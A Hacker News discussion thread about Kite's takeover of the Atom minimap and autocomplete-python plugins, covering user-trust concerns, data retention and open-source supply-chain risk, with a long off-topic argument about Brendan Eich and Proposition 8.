There's no implementation I can think of where I wouldn't feel icky about this, even if the 'Kite update' did absolutely nothing without turning it on explicitly through some setting that I actively have to look for (so no 'would you like to opt-in' screen' at all).

From @abe33's comment:

  Secondly, even if it may seems to come late, we've heard you and decided
  to revert all the changes related to the python links feature. The next
  release will no longer show anything. I'll also make sure that the relation
  between Kite and the minimap package are as clear as possible. I've been an
  employee at Kite for over half a year now and this plugin is now
  officially maintained by Kite.

Even if there was nothing contractual, being asked to do something like this by the CEO after starting a new job would make anyone feel pressured to play along and not make a bad early impression.

fine print my freind...fine print...ie giant unreadable employment contract.

only speculating but truly possible.

  > It must have been frustrating for him, as the plugin's
  > original developer, to be dragged through this crap.
Completely agree.

Then, this sets a precedent. It reminded me of Google injecting some binary code into Chromium [https://news.ycombinator.com/item?id=9724409]. However, we have a single person here. I can wholeheartedly imagine, that this can cause quite some stress. Also, it could have happened to many, I think...

Edit: I'm happy about the discussion here. At least, this won't happen again, anytime too soon.

I've tried Kite twice now. Once when it first launched, and once again when I installed autocomplete-python and it persuaded me to give it another go.

So far I have found it utterly unconvincing to the point of near uselessness. It rarely finds anything intelligent to say about my code, and gives a significantly worse view of documentation than Dash (for which I have a hotkey bound for near-instant lookup).

On top of that, I found Kite to use significant resources, there's no way to inspect what it's uploading so now way to ensure you aren't uploading things you don't want to, and the second time I tried it the UI was filled with dark patterns and I found it quite difficult to uninstall (I reverted to just trashing all the files I could find relating to it).

I paid I think $79 for a year of Kite-pro and frankly, so far it is pretty useless. That said, it has permissions and settings to whitelist which folders on your computer can be indexed. Then, the settings page states that if you remove the directory from whitelisting then "any directories removed here will also be removed from Kite servers." Of course, that doesn't mean they will actually remove previously indexed data. Overall, probably this is a product that I would not want my dev team to install.

I'd ask for your money back. Installing Kite left me with a really bad after-taste, but at least I assumed that if I'd bought into it, it would do as advertised.

This is the minimap fork:



It is a featured[1] Atom package, which may point to whom is GitHub endorsing in this issue, though we could see a more direct response from them regarding both minimap and autocomplete-python.

After reading sadovnychyi's reaction[2] to the autocomplete engine selection screenshot, I think forking is also the only remaining step for autocomplete-python.

[1] https://atom.io/packages

[2] https://github.com/autocomplete-python/autocomplete-python/i...

> “Most users who install autocomplete-python close the engine selection prompt, which results in not getting Kite or its benefits”

This type of entrepre-narcissism has to be shutdown hard. How deluded does somebody have to be to imagine that putting a confirm-shaming dialogue in an opensource tool is not Advertising?

They're not deluded at all, it's just damage control. If they didn't believe it was advertising, it wouldn't be in the tool in the first place.

Every interaction I have with these kind of guys proves to me that they deep down believe their own BS and that they are actually blind only to their own actions. I consider a delusion much more dangerous than a malign stratagem.

Yea, it really confirms this as a corporate strategy.

I just uninstalled Kite.

It's a real shame as the service was good, but nothing is good enough to justify advertisements in my work-space. The fight against distraction is hard enough as it is without having to think carefully about where I'm clicking due to dark-pattern UI.

So how was your company okay with you uploading the company code to Kite's servers?

He didn't mention using it under a company. I was tempted to use this for personal projects as I don't care where my code gets uploaded, it's all on github anyways.

The reviews above made me reconsider.

L'état, c'est moi

I'm a freelancer, and my code is open-source anyway.

PSA: I removed the whitelisted directory from my local install of Kite and then uninstalled the application. Logging into https://kite.com/settings/files still shows my machine and all of the synced files.

I still had to manually purge my machine and files from that page.

If you think your files were removed, check again.

Extra PSA: I deleted my files from that page a few months ago and they have now reappaeared. (See my other comment.)

I would recommend emailing them to delete your account and data, including backups and so on.

Hi, Kite founder here. If you uninstall right after removing the whitelist directory then the removed files may have not have been synced to the server before the uninstall, particularly if you have a lot of files on your machine. We will address this by adding a "remove all whitelisted directories and log out" link to the local settings.

Something different was likely happening in bfirsh's case (sibling comment). If you delete the files from the kite.com/settings/files page but Kite is still installed then they will get synced up again. The most fail proof way is to uninstall and then wipe files from kite.com/settings/files. We will make the wipe files link log Kite out on that machine.

Sorry about the edge cases. We've been working on it, and will continue to do so!

It's nice this is getting more response today - my submission yesterday got no comments.

I almost spit my coffee out when I learned about this (as I'm a minimap user who had no idea this was going on). Not a fan of these shady practices - completely breaks the trust between package maintainer and users.

here, have an upvote -- on me

I think we need a swift and damning response to this. I'd rather have an even worse walled garden than the Apple 'App Store' than deal with having to worry about my source code getting stolen to be used by some stupid cloud service. I don't even want data collection in my text editor; maybe from the vendor its acceptable but not N times for each plugin. I now feel compelled to vet the network usage of any plugin I install.

Thanks, Kite. I'll make sure to remember this in case anyone ever considers your service.

Agreed. Also this should be the kind of stuff that gets the founders and employees blackballed in the industry as well.

Completely morally bankrupt. All of them.

Just like installmonetizer and all those associated with them, right?

Silicon Valley/the broader tech scene is going to look pretty empty if we do that to every employee of every company that has done shady stuff.

You say that like it's a bad thing.


Let's not make this a witch hunt. Yes, the company should be ostracised, but don't ask for every little person remotely involved with them to pay the price of a stupid lead decision.

I don't know much about this particular case, so I don't have an opinion on the comments above, but the argument that employees shouldn't be punished for participating in an unethical for-profit scheme doesn't really make sense to me.

Well, there is also the question of actual participation: Let's say [A]dam thinks they're not getting enough data and had this stupid idea to fix the problem, bought a bunch of repos when he had the chance, and told programmer [B]en to patch this in, while [C]hloe in another room is working on the website or tweaks the ML algorithm. How much is she at fault and involved here? What about [D]elilah and [E]ric in Support? Blaming them all individually and equally harshly for being associated with [A]dam is not really justifyable.

Completely agree, it's the classic Nuremberg defense.

This kind of polarised thinking doesn't really work - usually you don't have a choice if the entire system turns because it happens relatively fast and not all implications are completely clear to you in the beginning, and usually the system will also just plain lie to you to appear much less destructive than it is. Also: Then every single American is at fault for Trump? I mean, they let it happen, right? So they must take responsibility.

Collective punishment and guilt by association are morally reprehensible but getting everyone off the hook is equally wrong irrespective of their rank in the food chain.

I am not saying that you necessarily advocated for this position in your comment but I just felt the need to make my point clear.

Of course you can't paint all the employees guilty and leave it at that, that's not what the Nuremberg defence means. If an employee knowingly acts malicious under orders from their boss, then they are just as accountable.

To be clear I'm not advocating a witch hunt, but saying all employees are innocent because they were following their bosses orders is a Nuremberg defence.

I know - my comments were more about the initial demand, and it's a little bit of a misunderstanding that people immediately compared it to me trying to invalidate the nuremberg trials.

If programming were an engineering proffesion, each engineer would be responsible for ensuring that the code they worked on was ethical at the potential cost of their license. It isn't of course, but there is nothing unusual about demanding personal responsibility for social implications from individual employees like that.

What makes you think that that the coverage of this event to be unbalanced and vindictive?

I think that we all agree that this event should be documented and reported objectively as it's newsworthy proved by this very article here and it deserves a mention in a subsection on their Wiki entry.

The effectiveness of this line of defense hasn't improved since the Nuremberg Trials. And the directly responsible committers are not "every little person".

Am I the only one alarmed by how quickly this comment chain is escalating?

I hope so. This is the kind of thing where a swift and somewhat brutal response is necessary, I feel. I wouldn't necessarily go as far as digitally tar-and-feathering all the developers involved (I've made mistakes myself that were a result of thoughtlessness), but the people in charge should be sent a message that this is not acceptable, and quite frankly I think public shaming/blacklisting is entirely justified when it comes to them.

Yeah. But this is the thread where two proponents of "sending a message" are using the Nuremberg Trials as a case-study.

So people should quite obviously chill a bit. Even if the pitchfork-people in this thread only wish bad PR upon this company, thousands of people are reading these threads, and it only takes one slightly unstable personality to think he'll be a hero for the community if he publishes the CEO's honeymoon photos (or whatever).

Also, to keep this in perspective: they did nothing illegal. Changing the rules is a much better course of action than vigilant justice if you believe this to be wrong.

Is publishing honeymoon photos illegal? (I'm presuming nothing compromising.) If the photos were taken in a public place, then they are legal, and then therefore no harm done, right?

It depends of which country you are talking about.

I wouldn't make so much fuss for some changes that:

1.They have every right to make (it is open source and they have write access to the repo)

2.I have every right to either fork and reverse, or completely stop using.

I wish our world worked like that, but unfortunately blackballing requires that the median participants of a group have some sort of moral compass.

I gave up hope for such things after seeing staff, investors, and speculators tripping over their own dicks to invest in Brendan Eich's latest venture (Brave) and its ICO, with full knowledge of his revolting and public bigotry against gay people.

Money trumps morals, it seems.

The case with Brendan Eich's past donations is a troubling one, but I also found the way he was forced out of Mozilla questionable and also keep in mind that despite having this black mark on him, he's done many good things too and is not known to have done anything oppressive against anyone since then, yes troubling, but I also think that every person, even less accomplished one, has something they should be ashamed of in their past, so I don't agree that we should hold this one incident against him for the rest of his life, unless he does something to warrant it.

It's free speech whether you like it or not and I don't think your tactics of playing hardball with Eich or any other skeptic of gay rights would win him over to your cause as it foments feelings of resentment and discontent and likely lead to counter-productive results.

"It's free speech whether you like it or not"

So was the people calling for him to resign.

But that's the exact same situation, right?

Kite's business model is just as legal as Eich's free speech money. But people still think it's wrong, and so they try to find ways to discourage others to act similarly.

I'm not completely sure if such punishment works, but I'm pretty sure that if it works for Each, it will work for Kite, and vice versa.

It's not the same thing.

Kite's business model is attack against open source, thus pertinent to tech.

Eich's view on marriage is completely unrelated and attacks on his professional career for this are abhorrent and juvenile and should be condemned rather than encouraged. Even if you disagree with Eich's stance (which for the record I do).


Did he call for violence against homosexuals or this is just a strawman?

I must admit that I am not well acquainted with all the facts of this controversy, just the basics and I don't recall him calling for violence.

The government enforces the law through the threat of violence.

This is a very low effort flame bait attempt, and HN is not the place for flamewars.

I disagree that it's flamebait, but I do think this is all off-topic. But I just can't keep my dumb mouth shut when someone says that enforcing one's private religious views on others via the government is just fine.

A persons private religious views is no reason for a professional witch hunt. That is well beyond the pale of acceptable, and so is your comment.

There's no reason to turn this into a less reasonable version of a McCarthy type inquisition. Once we start up with that nonsense it doesn't lead to a good place. No matter how strongly you feel you are right.

To which "professional witch hunt" are you referring? Are "private religious views" still private when you are using the government to enforce them on others? Is a CEO who spends considerable sums of his own money to do harm to his own employees for no benefit fit to remain CEO? Are users not allowed to demand good behavior from the companies they support?

No. Users are not allowed to dictate private religious views to people who work for companies. That's unreasonable.

Boycotting a company because you don't like the political views of one of it's employees on the other hand is just silly.

What exactly is your issue with separating personal and professional life? Do you feel you should be professionally attacked or your company boycotted because you (presumably) support gay marriage and some people feel that's wrong? No, of course you shouldn't. You should have a right to vote, support, do whatever in this regard and it shouldn't affect you professionally.

Look, I personally support gay marriage. But this kind of behavior on the part of the "crusaders" is outrageous. It really is.

I think it's legitimately a fascinating discussion point! Thank you for engaging me on it instead of freaking out. While we disagree, I do understand where you're coming from.

Again, the issue was not his "private religious views." The issue was when he used his power and influence to enforce those views on other people who did not subscribe to them. The line is crossed when one tries to enforce their personal beliefs on others via the government. It's not about politics--I think there are many things in politics about which reasonable people can disagree--it's specifically about enforcing a religious viewpoint on other people through the government. I don't force my religion on others; I think it's reasonable to demand that others do the same, and to enforce that demand through the means available to me, which may well include a boycott.

Sure likewise. I mean, no hard feelings but go all the way up the chain to parent. He suggests Brave browser shouldn't get funding (and people shouldn't use it?) because at one point Eich gave a couple thousand bucks to a (failed) campaign to prevent gay marriage from becoming legal.

And who cares? The question should be is the browser any good.

Do you think people should call his place of employment and claim they aren't going to use the product unless they "fire the pervert"? It's ridiculous. It really is. And I'd be saying exactly the same thing if the relationship were switched.

The Proposition 8 campaign was actually successful in re-prohibiting gay marriage in California for about four years before it was overturned, meaning four years of legal limbo for already-married couples and four continued years of second-class-citizen standing for gay couples looking to get married. It also pushed out some incredibly offensive TV ads, claiming the marriage equality movement wanted to use schools to turn children gay and other nonsense. You can understand how someone affected by that proposition, and the decades-long fight before it, might not be so quick to say "oh, you rascals, let's let bygones be bygones;" even if marriage was legalized in the end.

I honestly don't know where I stand on Brave. I hate our current ad-supported world, and it's an interesting alternative to that. On the other hand, I loath Eich and have no interest in supporting him financially after what he has done. Mostly I just stay silent; my feelings aren't strong enough to actually oppose other people using it, but I won't use it myself.

Note that I never said anything about Brave one way or the other. My response was simply that Eich's donation was not simply "free speech," it was a sincere and successful effort to enforce his personal religious views on others, and that it's perfectly fine to oppose that behavior.

You sure post a lot about me on HN (search here: https://www.google.com/search?q=site%3Anews.ycombinator.com%...) for someone trying to "stay silent".

From my comment at https://news.ycombinator.com/item?id=12721891 (linked from https://news.ycombinator.com/item?id=13411986):

``Prop 8 would not and did not "nullify" any marriages licensed by the state in the middle of 2008. See http://www.sfgate.com/bayarea/article/Prop-8-not-retroactive...

Retroactive or ex-post-facto law is unconstitutional. I am a big fan of this principle. It protects all of us.''

Now, how about you stop the hate ("I loath [sic] Eich")? I do not hate you.

> I do not hate you.

You can use whatever word you like, but you used your money and influence to cause incredible amounts of harm to your fellow citizens and previous employees through your bizarre need to use the government to enforce your personal religious views on other people. I don't know the right word for that kind of behavior.

So you concede your assertions about "legal limbo" were false -- good. That's progress.

Moving on to assert "incredible amounts of harm" as caused by me among a majority of Californians who supported both Prop 8 and the prior work of Mark Leno et al. on Domestic Partner Law, California's form of civil unions -- which as https://en.wikipedia.org/wiki/Domestic_partnership_in_Califo... says, and as Leno said at the time, ensures equivalent positive rights under state law for all -- is nonsensical.

We were allies when we supported civil unions. Obama was on side of civil unions in 2008, and likely strategically lying that he believed marriage was one man and one woman. Then the goalposts moved, and incredible yet heretofore invisible harm was being done? Nonsense.

Fixating on "religion" is also nonsense. Theft is against the law. Major religions teach that theft is sinful. Does this mean religious people are enforcing personal views on other people? Of course not. Atheists (I know some; neo-Darwinian evo-biologists) supported Prop 8. People who didn't like the Foucauldian agenda behind the whole thing, or the judicial overreach, or mayors like Newsom overreaching, supported Prop 8. For many and usually coherent reasons, religious or not.

It shows either ignorance or ill will to dismiss both group diversity of thought and individual integrity of thought by labeling views you dislike as "religious", and therefore somehow illegitimate as the basis of action in the public square. Frankly, it is un-American.

You are entitled to your own opinions, as Daniel Patrick Moynihan quipped, but not your own facts. The fact is Californians including me who supported Domestic Partner Law did not do "incredible amounts of harm" up to May 2008. We did not suddenly start doing harm in June 2008 when Prop 8 got on the ballot. We did not do harm when the majority passed it.

Federal law, DOMA -- an unconstitutional power grab against the states by congress and a pandering president -- caused hardships for Domestic Partners in Californians, but Californians could do nothing about that Bill Clinton era law.

As my search link shows, you've been calumniating me on HN for years, while trying unsuccessfully to stay silent on the topic. I'm not optimistic you'll stop now, but that search also shows I've tried engaging in good faith. Here I am again. Instead of silently dropping refuted assertions and moving the goalposts, e.g., to vague "incredible amounts of harm" imponderables, how about making an explicit statement of whom I harmed, how I harmed them, and how I can make amends.

The anti-gay community has a long, long history of belittling and harming gays[1,2]. Prop 8 was a continuation of degrading behavior towards gay people. Advertising claims that gay people want to harm or abuse children directly leads to anti-gay sentiment, which leads to closeting, bullying, and abuse. The campaign you donated to aired these kinds of advertisements[3] and the proposition itself was a direct attempt to maintain gays' second-class citizen status.

I do want to sincerely apologize if I've been misrepresenting your viewpoint. If I have, it was unknowingly. I assumed it was religious, because that's by far the most common objection to it. In all our years of sparring, you still haven't explained why you're opposed to gay marriage, to my knowledge. You always dance around the issue. If you tell me that it isn't based in religion, then I apologize and will immediately stop making that claim. But then what is it? If you're not actually opposed to gay marriage, but rather something like judicial overreach, was the continued harm to gay people worth whatever point it is you wished to prove?

> how I can make amends.

I can't speak to others. For me personally, an apology for supporting the campaign and a statement in support of gay marriage would shut me right up.

[1] https://en.wikipedia.org/wiki/Suicide_among_LGBT_youth

[2] https://en.wikipedia.org/wiki/Anti-LGBT_bullying

[3] http://www.slate.com/blogs/outward/2014/04/04/brendan_eich_s...

(Did you miss the "Update, April 23, 2014" at bottom of [3]?)

I never bullied anyone, so leave that out. Be careful arguing that I'm responsible for others' actions due to systemic problems and biases. That fallacious line of argument cuts in many directions.

Your whole approach, asserting religion only and as if illegitimate, asserting incredible harm ascribed causally to me personally, then moving on after rebuttal without any amendment to your assertions, shows ill will. I'm not going to "dance around" anything with you, and we are nowhere near a common understanding of all our priors.

The best I hope for is try to find common factual ground, which we are doing, slowly.

However, if you can only keep assuming your conclusions and smearing me by association with groups or people I didn't and don't support, I'm out. If you see no way for civil society to function without all the dissenters -- religious or not, we are many -- toeing your line and apologizing for their heresy, then we are definitely done. We can agree that "Error has no rights" and stop now.

I may not agree with you on everything you stand for (or against) but I feel for your position the more I read comments that speak ill of you.

If nothing else, these people come off as sociopathic and it makes me wonder if they are in opposition to you because they feel something immoral has been committed or simply because they just want to let out their hatred into the world.

Why not both? Jonathan Haidt, http://righteousmind.com/, goes into depth with moral psychology on why it feels good for many to vilify, call out, hate-mob, etc., and why we're seeing more such strife in the US, e.g., on campus. Recommended.

I had a response all typed up, but I wiped it, because I'm being unproductive by trying to argue. I should be trying to understand.

My viewpoint is that the only reason to oppose gay marriage is because you believe that gay relationships are inferior to straight relationships. Can you please explain to me a reason to oppose gay marriage other than that? You listed a few earlier:

> People who didn't like the Foucauldian agenda behind the whole thing, or the judicial overreach, or mayors like Newsom overreaching, supported Prop 8.

I don't know what "Foucauldian agenda" means. Sorry.

"Judicial/Newsom overreach" don't make sense to me in the context of a public referendum. These people voted against something they wanted just to prove a point about something else(?); and then what, they were going to vote in favor of it again sometime in the future? Okay, but that's pretty baffling behavior.

I just have a hard time believing anyone in support of gay rights would choose to vote against gay rights and support anti-gay organizations. Maybe you can explain this more for me.

"These people voted against something they wanted" -- no, people objecting to judicial and mayoral overreach voted to override that overreach. See https://news.ycombinator.com/item?id=12721928 on judicial restraint. I'm baffled you got my point exactly backwards, so pausing here.

Ok. Understood.

But people have all kinds of ideas about what constitutes "proper and fair". Some people feel differently about marriage and being gay than you do (Or I do). They might come here and argue about perversion and degradation of society and and what their kids are exposed to. And what can and can't be tolerated as far as behavior. And how marriage is such and such and doesn't apply etc. etc. And, they feel every bit as strong about it as you do. This isn't a wacky fringe view (yet) and it isn't considered "discriminatory" by the people professing it.

As far as I know Eich doesn't condemn gay people for being gay. He just apparently has certain views on what constitutes marriage. And he isn't alone in these views. I don't agree. You don't agree. The Supreme Court doesn't agree. But the public crucification of the guy's professional work because of these beliefs (which as far as I know he kept private) is to me 100 times worse than the views he holds. And it's a dangerous stance to take. We've been here many times before. Moral crusaders (of all stripes) out to improve the world who do little but cause destruction. At some level we have to accept not everyone shares our backgrounds or political beliefs and work with this fact in a constructive, civil and reasonable manner. It's part of becoming an adult in a multicultural society.

I appreciate you aren't trying to knock his work, that was OP. My only complaint is your original over the top rhetoric, other than that fine, I understand you have a different view than Eich. But you can not like an idea a person has without personally hating a person for having the idea. And that is the right thing to do.

I think for quite a few people (including myself) it wasn't primarily about 1) his personal views being disagreeable to us, and/or 2) him 'expressing' these views through a donation, but rather 3) him being CEO of Mozilla.

I'm still not certain whether I agree with what happened entirely, but calling it ridiculous is a bit of a stretch.

Being in the position of CEO gives you many powers and perks, and I think it's perfectly acceptable that it also gives you responsibilities that may include 'not being controversial'. I'd say this is especially the case when you're CEO of a a very large, important, and well-known non-profit.

Basically, it's the whole 'with great power comes great responsibility thing'. People in positions of power can be held to standards that don't necessarily apply to everyone else.

I completely understand if people disagree with this position, but it's far from ridiculous.

(and of course I can't speak for those who do feel that aforementioned reason #1 and #2 are enough).

Oh please, Brandon chucking Javascript together has caused more pain than his questionable funding of certain interests.

Are you serious? Eich wrote it for Netscape in 10 days. If you want to blame anyone, blame those at Netscape who only gave him a week and a half. He did a phenomenal job given the situation.

If we have to lynch somebody for JS, I would prefer to start with IE6 development team.... I still have PSTD /s

Thanks for mentioning Brave. I've really been enjoying using it as a browser. Typing this response on it right now. Really hope it gets some traction as it's a cool idea.

I think your claim of "bigotry" is a bit overstated and I don't really care about people's political views in this context.

Google introduced and normalized the spyware/adware business model. Nothing but fawning adoration from programmers.

Microsoft copied the model for operating systems. Token resistance from programmers.

Kite copies the model for programming tools. Too late, programmers.

The problem is not that they built some product and monetized with ads. The problem is they injected themselves into a product they didn't build. Worse yet, they're open source projects.

If you can't see the distinction between this and the examples you mention, you really don't qualify to make sarcastic comments.

Exactly. And don't forget about the proliferation of the internet-of-shit devices, which are blasting everything they can learn about your home network to every company involved.

HN is specifically geared towards people who make a living coding things in the new "surveillance economy." This particular example (to go along with the dotnet command line issue) is just a difference in degree, not kind. They're mad that someone else is abusing their trust and privacy.

Welcome to the party, pal!

Let's not forget the "exploit open source/free labor" component of a key demographic of HN's audience.

I'm pretty sure that the only OS that don't have adware/spyware in them at this point are some Linux distros (maybe) and Unix.

There are tons of attack vectors that spyware can enter linux through :)

"Unix" isn't really a specific OS. So yeah, there's probably no spyware in it.

By Unix I mean FreeBSD, OpenBSD, NetBSD.

> Nothing but fawning adoration from programmers.

That is a narrow way to look at things and is not the full picture. Plenty of people protested and still protest Google's unethical business practices.

Brand power! I get totally nauseated every time tools/frameworks/programming languages get adopted just because they have the Google brand on it, when there are perfectly better alternatives.

Holy shit that 'apology' is a steaming pile of crap. This guy is actively subverting not one but multiple open-source projects and he responds with some pathetic crisis-management sob story and an 'oops, sorry'?

He did revert the minimap changes. That's more than just saying "sorry".

But I'm waiting for autocomplete-python to be changed, too...

It may really be a sorry, but also some damage control too.

And they are sorry they got caught, not sorry they did it. As is tradition.

Open source is very vulnerable to manipulation. Some years ago, I spent some time trying to understand the PAM module LDAP module on Linux (PAM is used to enable external authentication so its critical code). I found it to be completely impenetrable. We take such components for granted but if someone could inject malware into such code, it could be catastrophic.

Not to mention it must be trivial for a large and determined adversary to subvert Debian, Arch or other distributions' packaging process, for example by getting a "sleeper" rogue developer in there. As someone into security and using open-source systems exclusively, it would be somewhat embarrassing to become a security problem yourself that way.

I don't distrust Linux distributions' respective security guidelines; but it can't be that hard to find a loophole in community-driven system/software development and the damage would be substantial if a popular Debian package would have been subverted and have gone out with updates.

The same statement could be made about any organization. If you get a sleeper agent into Apple, Google, Microsoft, whatever... There is a certain amount of goodwill we rely on in this world.

It's not quite the same thing as, AFAIK, the debian project doesn't have the same power as an employer does to do background checks before hiring.

There's a significant level of risk around open source projects changing hands, something which may be invisible to the users of those projects, especially as they become more heavily used and therefore more tempting targets for attackers.

Employers only have that power because you grant it to them. Of course you don't have a lot of choice if you want the job.

In theory, Debian or any organization could do the same background check, but is that the best use of their limited resources? And would they want to do it anyway given the ideals of the general OSS community?

Sure, my point was companies do do that checking and Debian doesn't do that checking, so from the perspective of this risk, it would be harder for an attacker to do this to a large corporate like Microsoft than it would to do it to an open source project like debian.

But companies wouldn't give commit access to somebody they just "hired" over the internet that "wants to help", and they'd (hopefully) have multiple layers of code sign-off before it ends up in the repository. Having worked in PCI-DSS environments, it would not be easy to get code into production without anybody else noticing.

Open-source projects often have random people "from the internet" working together with a great deal of individual autonomy (authority doesn't go down well when you are contributing for free). This ad-hoc style works well for open-source development, but it does make some kinds of code/system subversion a lot easier and we'd do well to keep that in mind.

Besides, I'm into open-source and security exactly because I don't want to rely on the goodwill of Apple, Google and Microsoft. ;)

Most large software companies do continuous scans of their own source code looking for potential backdoors. Obviously this is not guaranteed to catch such attempts but definitely necessary in the current environment where Zero days are so valuable.

Most of the tools I know in this space look for known issues.

OSS teams could spend the time and money running these tests, but this seems like a good area where governments and companies can step in to help.

Exactly, no organisation is immune to sabotage.

I'm pretty sure this is somewhat unique to the history of pam_ldap and its stewardship by PADL Software compared to other PAM modules; its dense nature encourages commercial engagement for those who care enough to know how it works or want to use it for their own purposes. They're not motivated to make it easier to understand (i.e., for outsiders to contribute to or maintain).

pam_sss is easier to understand and its functionality expands upon it, but it was a redesign.

This is really fascinating - I agree that PAM LDAP appears to be especially obscure compared to other modules.

I think that is an unavoidable consequence of the openness.

Honestly, I feel that at the very least the core team behind Kite should be held accountable for what they're doing. I'm not arguing in favor of an all-out witch hunt, but in the context of developers doing their development thing this kind of behavior should have consequences that potentially might include 'black-listing' at least the higher-level people behind it that thought this was a good idea.

In short: A startup is taking control of open source editor plugins relevant to their product.

I admire their cleverness.

If it were me: I'd create an extension interface for completion libraries to accept third party plugins. I'd stop at putting in a third party stuff in by default. A sufficiently good plugin API for python-autocomplete shouldn't require it even to know about Kite.

That said, I don't think Kite should be disallowed. If they have a secret sauce that they think can empower completion plugins, give them an API to plugin to.

It's not in the spirit of open source to shut the door on proprietary solutions (IMO). Transparency should be paramount. Normally most Linux users opt-in to using proprietary/blob software/drivers one way or another anyway. Open source projects routinely maintain relationships with vendors (NVIDIA, Intel). It doesn't necessarily mean evil is at work.

Though, as someone who's struggled with the performance and reliability of completion tools, I don't know if I'd personally opt to outsource that functionality. I'd wait and see if our current tools get better.

So, what prevents any Atom package from being silently taken over and turned into a private code Hoover? Is there anything in Atom's packaging APIs that ensures plugins that can read source cannot also access the network without permission?

As far as I know: nothing yet. It hasn't been necessary. I don't think people even thought about it. But I think now it's going to become an ordeal...

This is why we can't have nice things. As you say, such limits weren't necessary - because people in the community weren't assholes. Now, thanks to Kite's abuse, somebody will have to implement a permission system to editor plugins...

That is probably a long time overdue though in the case of editors like Atom.

Simply put; if some unethical corporation can hijack projects like this, then a much more malicious actor can as well. One that isn't as easy to detect, and does much more harm (like harvesting any code or input that looks like it could be private data such as credit cards numbers, SSNs, email and passwordish strings found near each other, etc.).

Extensions, plugins, and what have you are cool, but straying outside of the fairly monitored confines of you OS's controlled packages carries a risk.

Man, where does this crap end? A permission system to click on a menu or type a character? A permission system to draw windows...?

I think there has to be some responsibility from projects that pack such plugins, to police their ecosystem. I can understand browsers having security layers, because they work exclusively with the biggest cesspool of them all (the internet), but stuff as basic as a text editor should not need something like that - if it does, something else has gone deeply wrong with the project.

Interesting that you use browsers as the example of the other end of the spectrum. This particular text editor is built on a browser.

That's very true - it's also the reason I stay the hell away from it :)

If you are looking for the github thread – https://github.com/atom-minimap/minimap/issues/588.

Total biased takeaway [Please read all the github complete thread.]:


> Hi, folks -- Juan from Kite here, thank you for the feedback, we appreciate it.


> We have decided to leave the feature as opt-out since many users have found it useful. [...]


> [...] I've been an employee at Kite for over half a year now and this plugin is now officially maintained by Kite. [...]

I think that the BDFL system work in open source because it's too easy to fork the project. The old BDFL just transferred the power to a new BDFL, but it was not so clear for the community. There is a fork now, so if the situation doesn't improve and the users are unhappy, the Kite team will be the BDFL of an empty project without users.

Benevolent Dictator for Life for anyone else who was wondering.


This is one of the things that makes me think software development, like most other professions, should really have a formal code of ethics. If a lawyer or a construction engineer tried to do something equally dodgy, they would very soon find themselves hauled before a professional authority.

It should be made clear to the employees, management and investors of Kite that this is the sort of thing that marks you as someone willing to engage in unethical and underhanded behaviour. I wouldn't hire any such person into any team I manage, and I suspect quite a few other people wouldn't either. Actions have consequences. Especially unethical actions.

Lawyers do dodgy and unethical things as well, I wouldn't use them as a paragon of ethics.

An argument that explicitly talks about the consequences of unethical behaviour when it happens is not painting anyone as ethical paragons. You are missing the point, I think.

Heh, you know something is seriously f*cked up in industry when lawyers are taken for an ethics compass.

This is called a 'fiduciary duty' and is common in many professions (law, medicine, finance, real estate, clergy, etc)

Here's a great explanation and strategy for applying to software development: https://www.theatlantic.com/technology/archive/2016/10/infor...

I believe that is a self-conflicting proposition, since I believe morality is a subjective "property"

"Subjective" how exactly? There are surely some variations, but if this is about "my wallet has feelings too" morality, that would be all the more reason we'd need an (enforceable) code of ethics.

Subjective in the sense that something you find morally wrong i could find it morally right, or morally neutral. E.g. for the specific issue of this thread, I consider what they did to be morally neither bad or good. The developer has no obligation(moral or legal) to check with me before commiting stuff in the repo he controls. He doesn't owe me anything. In fact I could say that I owe him (morally, by my moral standards, because I 've been using his code). But that's just my view.

Well yes but morals and ethics are almost by definition about valuing the interaction between people. As such, even if you assume that moral is subjective, if you only have your own personal morality, that's rather useless - it only becomes useful if you can agree with some other people about common rules of behavior.

You could say for yourself "I personally don't believe in private property, so I don't see any objection with theft" but my hunch is that this argument wouldn't do much to calm the victim of your theft.

That proposed code of ethics in software seems like an attempt to create exactly such an agreement.

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact